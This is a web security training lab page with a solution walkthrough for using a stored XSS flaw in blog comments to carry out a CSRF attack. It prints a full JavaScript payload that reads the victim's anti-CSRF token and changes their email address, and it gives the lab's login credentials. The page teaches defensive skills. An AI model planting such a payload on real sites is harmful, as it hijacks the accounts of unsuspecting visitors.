Lab: Exploiting XSS to perform CSRF

PRACTITIONER

This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.

You can log in to your own account using the following credentials: wiener:peter

Hint

You cannot register an email address that is already taken by another user. If you change your own email address while testing your exploit, make sure you use a different email address for the final exploit you deliver to the victim.

Solution

  1. Log in using the credentials provided. On your user account page, notice the function for updating your email address.
  2. If you view the source for the page, you'll see the following information:
    • You need to issue a POST request to /my-account/change-email, with a parameter called email.
    • There's an anti-CSRF token in a hidden input called token.
    This means your exploit will need to load the user account page, extract the CSRF token, and then use the token to change the victim's email address.
  3. Submit the following payload in a blog comment:

    <script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/my-account',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/my-account/change-email', true); changeReq.send('csrf='+token+'&email=test@test.com') }; </script>

    This will make anyone who views the comment issue a POST request to change their email address to test@test.com.

Community solutions

Michael Sommer